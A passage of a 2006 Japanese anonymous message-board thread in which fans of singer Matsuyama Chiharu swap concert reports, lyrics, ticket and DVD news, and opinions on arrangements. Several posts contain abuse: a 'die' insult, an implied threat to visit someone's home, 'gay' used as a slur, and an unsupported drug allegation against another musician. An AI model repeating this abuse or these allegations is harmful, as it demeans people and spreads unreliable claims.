今月27日に金沢市観光会館で開かれるのは、9月の「つま恋ライブ」で往年のファンを熱狂
させた吉田拓郎のコンサート。全席1万円と高額にもかかわらず、1800席がほぼ完売した。
主催する北國新聞文化センター(金沢市)によると「男性が1人で買い求めるケースが圧倒
的で、コンサートとしては珍しい傾向」という。


123 :NO MUSIC NO NAME:2006/10/15(日) 21:01:07 ID:usnCGNme
明日ライヴ行って来ます

124 :名古屋のクラ:2006/10/15(日) 22:58:46 ID:VFjTMMrF
ワウワウライブみたけどやはり実際足はこんでね!伝わり方が違います。千春の熱い思いは生でないとな。ビデオでは鳥肌たたないから

125 :NO MUSIC NO NAME:2006/10/16(月) 02:43:06 ID:UXkV7t91
「この部屋を出ていくならば 僕が背中向けている内に 悪いけどさよならは言えそうもない まだ君を愛してるから」
って歌詞を使う曲のタイトルご存じの方いらっしゃいますか?
親父のカセットを小学生の頃聞いて覚えたんですがタイトルとこのフレーズしか思い出せなくて

126 :NO MUSIC NO NAME:2006/10/16(月) 11:40:26 ID:KrCH0VuJ
「雨上がりの街」ですよ。いい曲ですよね。

127 :NO MUSIC NO NAME:2006/10/16(月) 14:34:58 ID:8+FFic5H
雨上がりの街がとてもきれいさ〜〜

の次なんだっけ?

128 :NO MUSIC NO NAME:2006/10/16(月) 15:05:57 ID:KJzrIv6E
車の流れさえ〜ネオンサインさ〜♪

129 :NO MUSIC NO NAME:2006/10/16(月) 20:15:59 ID:sItobxb+
俺は好きだなぁ〜♪
癖の有る自分がぁ♪

130 :125:2006/10/17(火) 01:42:58 ID:V5/mGgWd
>>126
タイトルは全く覚えてなかったので(小2くらいだったから多分曲にしか興味無かったんだと思うが)
雨上がりの街って言われても正直ピンと来ませんが答えていただきありがとうございました。
実家に聞いたらテープはもう無いらしいんで音源を探してに行きます

131 :NO MUSIC NO NAME:2006/10/17(火) 14:25:13 ID:Gn/9zgxM
曲名や順番は覚えていないのですが、福岡のコンサートは一味違ったのかな?と他の書き込みを見ていて思いました。
アンコールは大阪から来ていた青年が「青春」の歌詞を大きな紙に書いて掲げたため、千春さんがそれを見ながら熱唱。
その青年はTシャツ貰っていましたね。
それからギターの宇山君の「東京タワー」弾き語りもありました。千春さんは舞台で座って聞いていました。
ここの掲示板で大好きな「人生の空から」や「長い夜」があったので楽しみにしていましたが、それは歌わず。時間の関係かな?
閉幕まで2時間45〜50分くらいあったと思います。
今回は元気いっぱいで楽しかったですね。年末の玉名はここ2,3年行っていませんが、何か気持ちが動いています。
残りコンサートツアーが盛大に無事終わるよう祈っています。

132 :NO MUSIC NO NAME:2006/10/17(火) 14:30:51 ID:QiU7Ml/S
福岡、行きました。あちこちで声の調子がいまいちだったと聞こえてきました。
佐賀から連日のコンサートになった為だとおもいます。。。
それでもあの声量で聴かせてくれた千春は、やっぱ凄いなぁ。。。って、再認識しました。
年末の玉名☆ぜひ、行きましょうよ。。。

133 :NO MUSIC NO NAME:2006/10/17(火) 19:59:39 ID:3rUIUOJ8
あの玉名って何んですか?全然わかりますん(;_;)

134 :29:2006/10/17(火) 20:45:22 ID:KkU9JnDn
>>133
95年からだと思いますが、毎年12月末、28日29日が多いかな?
熊本県玉名市の司ロイヤルホテルで2日間ディナーショーを行っています。


135 :NO MUSIC NO NAME:2006/10/17(火) 21:29:42 ID:Gn/9zgxM
>>131です
司ロイヤルは二日間あり、弾き語りが大半です。(バックは連れてこないから)
身近に見れて握手も出来ますね。バスケのせいか手が異常に大きかったですね。
最初のころは公にチケットを売らなかったようですが、今はTVなどでもCMしています。
この時期北海道は雪でゴルフが出来なくて、それも千春さんの楽しみだそうです。
ただ客筋がちょっと怖かったな・・・。行かなくなったのはそれが理由ですが。。。
千春さんの歌はいつどこで聞いても良さは変わらないですが、身近な生歌は格別ですね。
年末の休みをこれで過ごすのもいいでしょう。温泉地ですからゆっくり出来ますよ!



136 :NO MUSIC NO NAME:2006/10/17(火) 22:07:36 ID:7j+5dZt8
>>131
大阪から来ていた青年が「青春」の歌詞を大きな紙に書いて掲げたため

これはいったいどういう事ですか!?
後ろの人はステージを見れたのですか!?

137 :29:2006/10/17(火) 22:41:48 ID:KkU9JnDn
>>135
サポート連れて行きますよ。
昨年は夏目さん 春名さん 好永さん 宇山さんでした。
元々はゴルフ仲間だった亡くなった司ロイヤルホテル元社長の遺言で始めました。

138 :NO MUSIC NO NAME:2006/10/17(火) 23:29:01 ID:3rUIUOJ8
135 137ありがとうございました!また勉強になりました。しかし名古屋からは難しいなぁ〜行くのわ(;_;)

139 :NO MUSIC NO NAME:2006/10/18(水) 00:30:22 ID:SVeyc049
>>119 です。
福岡では、マイクを持って会場に降り歌いましたよ。
今「さよなら」と「よしたかちゃんと…」に、はまり毎日聞いてます。
勿論「再生」の総てガ好きです。

140 :NO MUSIC NO NAME:2006/10/18(水) 01:01:14 ID:GFCMvszG
>>136
こういう行為は止めて欲しいなあ
目の前の千春が一人のために遮られて
夢が冷めて怒りに変わってるファンもいるんです


141 :NO MUSIC NO NAME:2006/10/18(水) 14:04:36 ID:jrXNsamt
たしかに。。。予定外の曲を聴けたのはよかったかも。。。ですが、
紙の後ろになった人達は、全く見えなかったと思います。
千春は男性ファンをとても大事にする傾向があるので、
紙を出したのが女性ファンなら、歌わなかったかな。。。とも、感じます。
一部のファンだけのコンサートにならないよう、みんなで気をつけましょう。
一番前でも、後ろでも、2階、3階席でも 
みんな同じ料金払って来ているファンですから。。。

142 :NO MUSIC NO NAME:2006/10/18(水) 17:34:22 ID:cU93xD+C
>>128 亀ありがとう てかもっと続くと思ったのに

2番 窓辺に咲いたサルビアは何も言わない〜
とかなかった?


143 :NO MUSIC NO NAME:2006/10/18(水) 17:38:21 ID:cU93xD+C
>>141 まあでも一曲分マッチ棒みたいなの
みえなくても思いがけず懐かしい曲を楽しめたと
思ってる方もいたかも知れません。
その辺は、当人の後方の方への事前配慮なんかと
絡むことだとは思いますけどね。


144 :NO MUSIC NO NAME:2006/10/18(水) 17:44:42 ID:cU93xD+C
WOWOWで聞いた「帰郷」 あんまり思い入れなかった。

あの手の曲だと  
夕焼けに赤く染まる〜〜
中略  上野発はつかり5号〜 の方が エグル
大して田舎育ちじゃないんだけど。



145 :NO MUSIC NO NAME:2006/10/18(水) 17:57:13 ID:cU93xD+C
あっ 「帰郷」 にエグラれる人ゴメン

146 :29:2006/10/18(水) 22:17:22 ID:HfBMstT5
>>144
空が赤く染まった薄暗い中で、ステージのバックに広大な台地が見える岩見沢の野外で聞いた「帰郷」は絶品でした。

147 :NO MUSIC NO NAME:2006/10/19(木) 14:37:26 ID:fOfnSjzB
http://page5.auctions.yahoo.co.jp/jp/auction/e62940027

通報しますた

148 :NO MUSIC NO NAME:2006/10/19(木) 22:39:28 ID:sx1S4kwp
前略あほです。
>>147のオークション 応募しても
、入札が取り消されるんですけど。なんじゃ。何で取り消されるんじゃ。
出品者が取り消しているのか。アホーがとりけしているのか?

金ならな、なんぼでもあるんじゃってもんじゃないけど、ある程度出せる。

愛って呼べるほどのもんじゃない♪ だけど.......。悲しい時には、空を
見上げたけど、   今日は真っ暗だべ。

149 :NO MUSIC NO NAME:2006/10/19(木) 22:44:50 ID:WnlwKgCp
>>148
直にメールよこせって書いてあるじゃん。
ヤフーが取り消したら出品物自体表示されなくなるから、
出品者が消してんだろ

150 :NO MUSIC NO NAME:2006/10/19(木) 23:15:25 ID:sxADyKZ4
>通報しますた

みんな通報しろ 俺も通報した

151 :NO MUSIC NO NAME:2006/10/19(木) 23:27:03 ID:WnlwKgCp
今のシステムは通報するとその度に出品者にメールが行くらしいから
結構効果ありそうだが、>147のような深層貧乏人には屁でも無いかもw

152 :NO MUSIC NO NAME:2006/10/19(木) 23:40:50 ID:sx1S4kwp
前略あほです。>>149
直にメールしました。なんか返信あったけど、
まだ、信用していいものかどうかわからん内容だった。
値段はいくらで。マルマル銀行とか、具体的な話はなし。

どうなることやら。
でも、手に入れたいね。ファンとしては。

153 :NO MUSIC NO NAME:2006/10/19(木) 23:44:10 ID:WnlwKgCp
>>152
取引自体は問題無いんじゃね?倫理的な問題以外はw
ただ大概この手の出品者は自分の情報を明かさないんだよな

154 :NO MUSIC NO NAME:2006/10/19(木) 23:53:16 ID:vXPNreoZ
100万で入札したら、どうなるんだろう。
即決だろうな。
それでも、入札取り消しするのなら、出品者は素晴らしい。

結論として、お金じゃないんだよな。見たい、聴きたい、共有したい。
そんな想いが大切なんだよな。
こんな思いで、出品してくれている人だと期待したいね(オークションの人)。



155 :NO MUSIC NO NAME:2006/10/19(木) 23:57:55 ID:WnlwKgCp
>>154
100万で入札しても3500円のままやがな。
次に101万まで入れる人が現れない限りは。

>結論として、お金じゃないんだよな。見たい、聴きたい、共有したい。
>そんな想いが大切なんだよな。
>こんな思いで、出品してくれている人だと期待したいね(オークションの人)。

それは違うんじゃね?
ホントに見たい人は一時でも加入して見るだろ。そうやってる人の立場が無くなる。
もし千春のCDを共有したいって言って1枚買ったのを1000人で共有して
千春にCD印税が入らない代わりに1枚買った人にお金が流れてたら?
それでもお金じゃないやそんな想いで済むのかな?

156 :NO MUSIC NO NAME:2006/10/20(金) 00:39:59 ID:nO3wWLKU
環境的にわうわう無理。友達いない
そんな人もいるのである。

コロンビアのCDにプロテクトがかかっているかどうか知らんが、
レンタルしてダビングする人もいるのだから >>155



157 :NO MUSIC NO NAME:2006/10/20(金) 10:10:39 ID:Havs7/Mt
>>142
見えないのは短時間、逆に遠方から来てくれて、
思いもかけない曲が聞けて、私は嬉しかったです。
今の千春は目を閉じてきいたが味わい深いし、
他のアーではまずやってくれた事ないので、
千春の暖かさが余計に印象的でした。

158 :NO MUSIC NO NAME:2006/10/20(金) 22:34:23 ID:/19qOB2d
>>157
うーんなるほど。今回は良いハプニングだったのですね。
自分の場合は、遠征する場合もあるんですが、
自分の地元ではないところではおとなしくするなあ。
「遠くから来ました!」って大きな声で言う事はしないです。
スタンディングだったらあんまり前に行かないし。
チケットが取りづらいコンサートだったら、自分のせいで地元の人が一人見れない訳だし。。。
やっぱ基本的にはコンサートはその土地の物だと思うからさ。
でも今回は千春さんが乗ってくれたから結果オーライだったのでしょうね。
乗らなかったら、多分スタッフが何らかのアクションを起こしたでしょう。

159 :NO MUSIC NO NAME:2006/10/22(日) 14:58:35 ID:DpDckH7U
26日に名古屋センチュリーホールへいきます
1F前方です。
今から興奮しております。

160 :NO MUSIC NO NAME:2006/10/22(日) 16:40:55 ID:E+hFfyZp
千春のラジオってパソコンで聞けるんだね

161 :NO MUSIC NO NAME:2006/10/22(日) 23:18:49 ID:trhUv3zZ
159私もその日は前列8やからあなたと近いな。おふくろ連れていきます。よろしくね(^O^)

162 :NO MUSIC NO NAME:2006/10/23(月) 11:26:55 ID:qbx3MXQL
26日は日本シリーズも見たいけど、私は1F12列めで千春を熱視線です

163 :NO MUSIC NO NAME:2006/10/26(木) 16:05:00 ID:50WFdj2C
26日の2F席ペアを25000円、27日の3F席ペアを24000円で
名古屋駅の金券ショップに委託した金欲傲慢な人がいました。
日にちが近くなるにつれ値段を下げてました
今日、店をのぞいたら26日分がなくなってました。多分、本人が引き取って
自分で見にいくのでしょう
明日の分は18000円でまだ店に並んでました。
はじめからその値段あたりで委託すればよかったのに…
馬鹿ですね〜

164 :NO MUSIC NO NAME:2006/10/26(木) 17:41:25 ID:KvwYOGyX
>>162
46 :NO MUSIC NO NAME:2006/10/23(月) 10:19:58 ID:qbx3MXQL
結果的には 盗作!
結論的には ゲイ!

165 :NO MUSIC NO NAME:2006/10/26(木) 23:59:57 ID:NiQTp/Kz
>>55
予言 見事に当たったね。オメ。
北の大地で見事な優勝でした。

166 :NO MUSIC NO NAME:2006/10/27(金) 12:33:19 ID:NlNaVIfG
>>164
暇なやつだな  キモッ

167 :NO MUSIC NO NAME:2006/10/28(土) 00:15:30 ID:llRDAGnW
2007年1月24日に30周年記念DVDが発売決定!!!!!

168 :NO MUSIC NO NAME:2006/10/28(土) 09:15:11 ID:D9Xmo9FL
>>167
わぁ〜!嬉しい!買います!

169 :NO MUSIC NO NAME:2006/10/28(土) 16:12:56 ID:SASQL7Yq
2枚組で 6000円だと!えらく安くない。買いますよ!

170 :NO MUSIC NO NAME:2006/10/28(土) 19:13:14 ID:hjTFd8vz
俺が映ってろ!w

171 :NO MUSIC NO NAME:2006/10/28(土) 23:50:49 ID:CZV0+Tz7
名古屋二日いったけど体調から何まで絶好調だな(^O^)アンコールでのど――もの叫びで身体が熱くなるのは私だけやろか?

172 :名古屋のクラ:2006/10/28(土) 23:56:00 ID:CZV0+Tz7
しかし、行くたびにパワーアップするあの歌唱力はいったいなんなんだ!?凄すぎるぞ松山さん(*^_^*)

173 :NO MUSIC NO NAME:2006/10/29(日) 12:35:03 ID:Yse9n5Vz
2日めは、ノドがかなり厳しいから、気合でやってる
歌の質なら1日めが断然いいよ  もう100回以上コンサートに来てるおれが
断言するよ


174 :名古屋の松山:2006/10/29(日) 23:09:43 ID:9GM5SvMP
なるほど、で二日目の弾き語りの恋のあの歌声はどうなのかな?寝てましたか、おたく?100回いったぁ?能書きはそれだかね

175 :NO MUSIC NO NAME:2006/10/30(月) 00:15:38 ID:/iMb3KsA
>>167
本当ですか?

176 :NO MUSIC NO NAME:2006/10/30(月) 00:54:19 ID:2M7lzMG+
>>175
本当だよ。30周年記念ライブDVDが発売されます。

177 :NO MUSIC NO NAME:2006/10/30(月) 20:49:18 ID:RJ9w0Icj
>>176
どこかのサイトに情報が載っているのですか?
コロンビアのHPには何もなかったのですが・・・

178 :NO MUSIC NO NAME:2006/10/31(火) 00:23:41 ID:t/LJ8mdR
>>177
2枚組、6000円です。


179 :NO MUSIC NO NAME:2006/10/31(火) 20:57:29 ID:SS8mCmab
太閤記のED曲、金福子だと思ったらこの人だったwww

180 :NO MUSIC NO NAME:2006/11/01(水) 23:32:52 ID:Cvkvylry
髪の毛がなくなり、その風貌は
こけし   みたいになったけど。
こけしは、こけしでいいもんだ。

よしたかさんの従姉妹の旦那さんのセンス最高。


181 :イタコの千春 ◆tpLqwERCIU :2006/11/02(木) 01:16:13 ID:5YJ8W7U/
曲を作り、それを聴いてもらうだけ。
それだけで俺は、素直にありがたく そして嬉しく感謝する。
自分の夢や生きがいを語ったことは、あまり記憶にないんだけど、
たった一人でもいい。俺の歌を聴いてくださる人がいれば、
それが生きがい、夢なのかもしれない。

いまもなお、たくさんの人にコンサートに来ていただいてなんかしたり、
CDを聴いて下さったりしていただいたりして、ホント・俺は幸せだと
思うよ。
 この先、いつくたばるかもしれない。ま、先はわからんからな。
特に天才の。
でも、一曲でもいい歌。唄い続けます。

ひ孫が、”おじいちゃんのお父さんが好きだったあの曲、僕も好きだよ”って
言ってくれるような曲。そんな感じの曲しか作れないけど、これからもがんばるべや。

だから、これからもよろしくな。
                          @千春


182 :NO MUSIC NO NAME:2006/11/02(木) 23:53:23 ID:mWP4X7LU
新シングル「祈り/月あかり」イマイチだな。
祈りはなんか歌い方が雑じゃね?30周年終わっちゃうから、急遽リリースしたんかなー?

183 :NO MUSIC NO NAME:2006/11/03(金) 10:12:30 ID:4GtPmF9M
>>174
調子こくな!ど素人!ハクチ!死ね!貧乏人!おまえの腐った耳で何が聴けた?

184 :NO MUSIC NO NAME:2006/11/05(日) 10:06:47 ID:/1PS/juu
>>174
「恋」 あれは千春の出来からは、それほどじゃなかったのでは…
あれで感動してるのなら浅い! 能書きたれは あんただよ

185 :NO MUSIC NO NAME:2006/11/06(月) 10:14:20 ID:g6+lkLHC
「祈り」演歌歌手の様、「再生」のカバー辺りから変。
日本民謡歌手じゃないんだから、もっとさらりと歌って。
千春らしくない、はっきり言って嫌い!CD返品したい気分。

186 :NO MUSIC NO NAME:2006/11/06(月) 18:17:46 ID:dmSMq21W
千春「前の方、座らないでくだすぁ〜い(ヘラヘラ
  どう思う?座ってたよ?、今
  前の方で見てるのにさぁ、座ってたよ?
  感 じ 悪 い ね 〜〜〜〜〜』

187 :NO MUSIC NO NAME:2006/11/06(月) 21:00:33 ID:830hmO15
186意味わかりませんが?

188 :NO MUSIC NO NAME:2006/11/06(月) 21:40:26 ID:aMT0w12t
186
それ 浜崎あゆ 

189 :NO MUSIC NO NAME:2006/11/06(月) 23:16:57 ID:sNhM811q
つーか古過ぎ。ここ懐メロ板じゃないのに

190 :29:2006/11/07(火) 00:24:33 ID:ZftrBNu4
>>185
アレンジに問題あり。
「再生」のカバーの「卒業写真」「妹」「どうぞこのまま」の歌い方はイマイチかも。丁寧に歌いすぎかも。
この曲をコンサートで弾き語りで聞くと最高だったのにな。

191 :NO MUSIC NO NAME:2006/11/07(火) 17:15:58 ID:X8SEkxSt
>弾き語りで聞くと最高

そこがこの人のすごいところなんだろうな

192 :NO MUSIC NO NAME:2006/11/07(火) 19:13:52 ID:GKCtbwgf
ようするに174のアフォは、浅知恵なんだね

193 :名古屋の松山:2006/11/07(火) 22:49:44 ID:P+7Sd+v+
で、おのれは人にもの言う前に身分なのらんかい!おまえの家まで行って説明してやるからよ!!

194 :NO MUSIC NO NAME:2006/11/08(水) 00:01:17 ID:dr3Upysj
今回のシングルを今週ので軽く解説してますな
ttp://www.stvr.jp/netmembers/

195 :NO MUSIC NO NAME:2006/11/08(水) 00:35:45 ID:0JXzcC8E
千春スレをみるとなんというか民度の低さを
つくづく感じる。いろんな意味でDQN丸出しの人が
多くて、千春ファンが全部こんな人たちだと思われると
一ファンとして恥ずかしい。

196 :NO MUSIC NO NAME:2006/11/08(水) 14:09:46 ID:ihyRd5Qa
祈り、、、最高っす

197 :NO MUSIC NO NAME:2006/11/08(水) 16:35:37 ID:Pw71E3yD
>>195
さだ信者の方がDQNが多いから安心しる!

198 :NO MUSIC NO NAME:2006/11/08(水) 20:30:55 ID:XB2JjMwe
>>192
864 :NO MUSIC NO NAME:2006/11/07(火) 19:09:31 ID:GKCtbwgf
槇原は、厚顔無恥ゲイ 
松本先生!裁判してはっきりさせて槇原を更生させてやってください
まだ、覚せい剤が抜け切ってないんでしょうから

199 :NO MUSIC NO NAME:2006/11/08(水) 21:06:59 ID:Pyzct9Ij
>>193
相当 粘着おばかさんとみた
>>198
こいつも

200 :NO MUSIC NO NAME:2006/11/08(水) 21:16:55 ID:RmPelw6J
>>197
●●よりは〜とか、○○の方が〜って他のと比較してる時点で既に…

201 :NO MUSIC NO NAME:2006/11/09(木) 00:11:44 ID:BsXn3uXr
199おまえもな(^^)

202 :NO MUSIC NO NAME:2006/11/10(金) 12:25:35 ID:PRvUIds3
>>201
おまえもだよ(^@^)

203 :NO MUSIC NO NAME:2006/11/10(金) 23:16:31 ID:iGI0DN3T
まあバカ相手にしとると疲れるわm(__)m もとのまともなスレに戻さないといかん

204 :NO MUSIC NO NAME:2006/11/10(金) 23:54:50 ID:3RAl5337
一部のコテや粘着が消えないと、この状態は治らないでしょうね。
ムキになってレス返す人や批判を一切受け付けない人とかも要らないし。

205 :NO MUSIC NO NAME:2006/11/11(土) 13:02:36 ID:sqtTL+7Q
1月に出る二枚組DVDはコンサートものだと思うけど、どこのコンサートのものかね?

206 :千秋:2006/11/12(日) 09:46:49 ID:+jZ89NcG
わしゃあよう!白い花みたあーにゃよう!くりゃあ歌がすきなんだっすわあ!

207 :NO MUSIC NO NAME:2006/11/12(日) 22:58:59 ID:9ckYXm47
しかし、このスレはやつぱ凄い松山ファンがかなり潜伏しとるな。情報、知識など私なんぞ足元にも及ばない人たちいるから・・でやはり30執念はアンコールの明日のためにがすごいな

208 :29:2006/11/12(日) 23:09:52 ID:mhO4HWuH
千春って弾き語りの方が歌の良さが出るし、断然上手いと思う。
バンドが付くと千春の良さが半減しちゃうよ。
これってアレンジに問題ありだと思う。
もっと千春の良さを引き出すアレンジをして欲しい。
ん?才能の限界なのかな

209 :NO MUSIC NO NAME:2006/11/12(日) 23:47:10 ID:Y0NyplEZ
あんさんも大変やね 女どもの訳のわからん投稿相手 

210 :みのや☆評論家:2006/11/13(月) 00:10:01 ID:5yT2pFQf
職務怠慢

211 :NO MUSIC NO NAME:2006/11/13(月) 14:22:52 ID:68zeiXyo
>>208
千春に能力の限界なんて言葉は存在せず。
日本一の歌唱力は、神の域に限りなく近づくのみ。
今「雨が空から降れば」を聞いてますが、
もはや俳句の“わびさびの世界”。

212 :NO MUSIC NO NAME:2006/11/13(月) 15:23:51 ID:FVgjiAaB
>>208
オロオロをギター一本で聞いたとき涙がでちゃいました。
でも演奏付きで聴いたときは思わず同じ曲なの?と思うほどガッカリしちゃった。
この他にもこう感じる曲が結構あります。
私も千春さんを活かせるアレンジが大事だと思います。

213 :NO MUSIC NO NAME:2006/11/13(月) 20:49:32 ID:XqI+PuHz
いや、でもバックに夏目はいないとダメだよ。去年の秋コンで抜けたときは味のないものだった、m(__)mやっぱり弾き語りとバンドは両立してなんぼやと私は思うじょ

214 :29:2006/11/13(月) 20:59:17 ID:fLaz4sBN
>>211
211さんは千春がアレンジをしていると思っているのかな?
読んだら分かると思いますが、才能限界かな?は千春のことではないですよ。
能力限界かな?はアレンジャーに対してです。
千春らしさを出すアレンジをして欲しいと思っているのです。


215 :29:2006/11/13(月) 21:02:37 ID:fLaz4sBN
>>213
アレンジは別として、ライブに夏目がいると安心感はありますね。
さすが長い間サポートしているだけに頼りになります。

216 :NO MUSIC NO NAME:2006/11/13(月) 22:31:24 ID:Ohak5TTV
千春さんって、本当にアレンジャーに恵まれないよなあ

217 :NO MUSIC NO NAME:2006/11/14(火) 22:48:20 ID:TMyjlc0e
白い雪とオロオロの出だしのメロ似てるよね。

久しぶりに 
白い雪をきいたら一瞬オロオロと錯覚してしまったもので。それだけです。


218 :NO MUSIC NO NAME:2006/11/14(火) 23:35:48 ID:5xWcd8Dn
名古屋二日目、客が君にの歌詞もってアンコールに千春に渡したのよ、で、千春が夏目に確認してピアノだけで即興で歌ったよ(^O^)やっぱつぶじ効く夏目さまさまだね!

219 :尾鷲のスナック ママの亭主:2006/11/15(水) 22:28:16 ID:HnlL1E2T
218
おまえ 夏目だろッ
よ〜やるわッ


220 :NO MUSIC NO NAME:2006/11/16(木) 00:25:29 ID:IVT3WPw5
わはははは、ハズレだぞヒモ野郎!まあがんばりや(^O^)

221 :NO MUSIC NO NAME:2006/11/16(木) 15:11:37 ID:OTn/GCKl
初心者でスイマセン、『オロオロ』って何ですか??

222 :NO MUSIC NO NAME:2006/11/16(木) 21:07:33 ID:uHQSA41M
福山で客がリクエストした「北風の中」は宇山さんが弾いてくれたけど夏目は無理だった。
今の「人生の空から」のアレンジはリズムがダサい。オリジナルの方が断然良かった。

223 :NO MUSIC NO NAME:2006/11/16(木) 23:39:45 ID:IVT3WPw5
221へ 最新アルバムの現実にはいっている曲です。しみいる歌だよ

224 :NO MUSIC NO NAME:2006/11/17(金) 17:54:46 ID:G/wTW2Ez
「北風の中」好きだなぁ、コンサートであんまり歌わない曲だよね
千春、この曲覚えてたんだ。東京で歌ってほしいな

225 :NO MUSIC NO NAME:2006/11/18(土) 19:20:59 ID:DrTJzau9
ちーさまは女遊びしてるの?

226 :NO MUSIC NO NAME:2006/11/19(日) 09:23:52 ID:MKF3TxOd
一度アレンジを井上鑑さんに依頼はどうだろ?
高すぎて無理かな?「宇宙のはるか」などは良いのだけど、
全体的には音が平面的で、
臨場感の有るアレンジが無い気がする。

227 :NO MUSIC NO NAME:2006/11/19(日) 14:00:49 ID:/fshOiML
名曲はたくさんあるけども 今の千春は支持できないね
自画自賛しすぎ ムネオ問題からすーかり聴かなくなりましたw
でも時々カラオケで 恋とか人生の空からを歌いたくなるんだよねぇ

228 :NO MUSIC NO NAME:2006/11/19(日) 21:47:55 ID:dtdtRIzQ
銀の雨や時のいたずらを唄うと何故かホステスは喜んでくれる
ばばぁだがねw

229 :NO MUSIC NO NAME:2006/11/21(火) 12:48:39 ID:3JF8wwcG
>>227
千春は自我自賛するに値する人と思いますが、
それに場を盛り上げるサービス精神もあると、
あの一曲一曲終るたびのお礼の仕方を見れば、
他のアーのライブにも時々行きますが、
千春の様に曲が終るたびに、
感謝の姿勢が感じられる人はいません。
傲慢になってるなんて事はなく、
言葉じりにこだわらなくて良いと思います。

230 :NO MUSIC NO NAME:2006/11/21(火) 19:25:59 ID:GqbZZSf8
俺ね、まったく同感なのよ、あのお辞儀
口調は荒いけど、振る舞いは謙虚なんだよね

231 :名古屋の松山:2006/11/21(火) 23:56:14 ID:Y4ClMDm+
だべぇ〜! そうだろ、誰が何と言おうと筋は通す男だよ、千春は。みんなライブみてから意見してな。なかなかチケットとれないけどみる価値は絶対にあるからな

232 :NO MUSIC NO NAME:2006/11/22(水) 19:45:48 ID:e0beeO/2
あれだけ歌もトークも聞かせられるミュージシャンはいないと思う
色々な人のコンサートに行ったけど、ズバ抜けてました

233 :NO MUSIC NO NAME:2006/11/22(水) 23:02:27 ID:Bh1xxj3L
また24日に蒲郡市民会館(愛知)行ってきます(^O^) 毎日WOWOWのビデオを見てるよ、飽きないんだなぁ〜これが!

234 :NO MUSIC NO NAME:2006/11/22(水) 23:59:38 ID:xGSI8KMx
>>232
あれがプロだよね。
一度行くとクセになる本物のコンサートだよ

235 :質問:2006/11/24(金) 07:00:37 ID:ne1k02Sl
千春さんは血液型O型ですか?

236 :NO MUSIC NO NAME:2006/11/24(金) 11:51:32 ID:j6siy1V2
O型だよ!大胆にして繊細だろ!?

237 :NO MUSIC NO NAME:2006/11/24(金) 23:52:12 ID:GoLF5Jt4
蒲郡行ってきましたが、いまいちでした。東海クリエイトのハマジさんだすときは体調悪いだとわかりましたm(__)m

238 :NO MUSIC NO NAME:2006/11/26(日) 23:13:36 ID:YCmFaWOR
盛り上がったと聞いてるが・・

239 :NO MUSIC NO NAME:2006/11/27(月) 12:49:29 ID:7GJJTZ4y
>>237
どの会場でも盛り上がらないって話は、
余り聞いたことないけど…プチアンチなの?

240 :NO MUSIC NO NAME:2006/11/27(月) 18:25:21 ID:qrATOSIS
ラジオを毎週聴くたびに、毎週千春の声はガラガラだよ
30年歌ってきたプロが、ガラガラになるまで歌ってるんだ、全力で歌ってくれてるんだ
手抜きを一切してないんだ、盛り上がらないわけがない!

 


241 :イタコの千春 ◆tpLqwERCIU :2006/11/27(月) 19:43:53 ID:irjjjt4M
週間PB40周年で発売された人生相談の本。あれだ、あれ。
俺の相談の部分が、あまり取り上げられてない。
岡本太郎とか、石原とか、野坂のアル中とか、古い連中ばかりが紹介されている。
本体はしらんが、読んでないだけだが。
この本の評価の記事を読むとだな、俺の分はあまり記載されてないんだよな。
けっこう長いことやったのにな。ま、どうでもいいけど ちょっぴり悲しいチハルちゃんでした。

ま、俺はシンガーだから。物書きじゃないからな。やつらには負ける。
歯がなくても、負けるものは負けるのだ。
右上4,5,6,7,8がないのに、ここまで唄える俺は天下無敵だろ。
右8は、親知らずで、無くても影響ないけどな。

入れ歯ってという方法も考えたけど、ま、あれだ。唄ってる最中にスコーン、
ヌリコーンっていう具合に飛び出したら 、それはお笑い芸人になってしまうからなw。
 地道にインプラント続けます。
それでは。

あ、それから宣伝になるけど、STVラジオの 季節の旅人
こここアクセスしてくれれば、電波圏外の方でも聴けるから。
http://www.stvr.jp/podcast/chiharu/file.php

ストリーミングで聴きたければ左クリック、ダウンロードして保存したければ右クリックで対象をファイルに保存で。


242 :NO MUSIC NO NAME:2006/11/27(月) 23:07:00 ID:6TnI9xIu
デビューから82年頃までのベストアルバムは沢山あるのに、それ以降のベストアルバムがないのは何故ですか?


243 :NO MUSIC NO NAME:2006/11/28(火) 00:01:34 ID:Uldgcqdq
>>242
前レコ会社がアーティストの意向関係無く出してるからじゃね?
ってか、最近もベスト出てるじゃない、風景とか季節の旅人とか

244 :NO MUSIC NO NAME:2006/11/28(火) 00:15:17 ID:vzQXKLje
>>241
インプラントは名古屋の病院でしたのですか?

245 :みんな悪りぃな:2006/11/28(火) 21:37:58 ID:HswD44c/
いゃぁ〜最近は同じツァーで二回三回行くから、比較してしまうんで、やはりプロやからキッチリまとめるけど、やはり人間だから10割ではなかなかいかないという意味だよ(;^_^A

246 :NO MUSIC NO NAME:2006/11/29(水) 07:09:22 ID:5TrzQCSs
だいたい千春がDQN的なファッションをするようになったのは、スキンヘッド
以来だろ。

千春もさだも、ハゲというコンプレックスがある。
千春はスキンヘッドにしたとはいえ、コンプレックスを拭い去ることは
できない。だがあのスタイルは、コンプレックスを持っていることを
他人に気づかせない効果はある。
なんとも男らしい話じゃないか!

その反面さだはどうだ?
以前よりも生え際が前進してるじゃないかよ!
もうアホかと・・・こんな自分さえ誤魔化すようなヤツに心に響くような
歌が歌えるとは到底思えないね!

247 :NO MUSIC NO NAME:2006/11/29(水) 14:26:37 ID:jFefIocq
>>246
歌とハゲは別よ

248 :NO MUSIC NO NAME:2006/11/29(水) 15:12:04 ID:GRyW4I0Y
コピペしてあちこちに貼付けてる奴の書き込みの方が心に響かないよ

249 :NO MUSIC NO NAME:2006/11/29(水) 23:38:07 ID:a0Jyp/b9
あのな、スキンにしようがカツラにしようが人の勝手やしガダガタ言うことやない!火事で頭ヤケドした人間がカツラ被ってたら、それを否定できるのか!五体満足で能書きたれてる奴ほど腹立つわな

250 :NO MUSIC NO NAME:2006/11/30(木) 12:18:53 ID:4dOg/83b
人の容姿をあーの、こーの言うやつは、大体自分自身がコンプレックスの固まりだ。凡庸でも聴いて、広い心をもて!

251 :NO MUSIC NO NAME:2006/11/30(木) 12:56:31 ID:N/VOZhtX
>>249の言う通り、スパッとスキンヘッドには中々出来ないよ。
バーコードになっても、何とか抵抗してる人が多いもの。
それだけ、千春は肚がすわってるって事。

252 :NO MUSIC NO NAME:2006/12/01(金) 05:12:48 ID:iQ0+OMNF
今日 東京国際フォーラムに行くゾ!

253 :NO MUSIC NO NAME:2006/12/01(金) 12:16:49 ID:aPmI0UBW
フォーラム行ったぞ
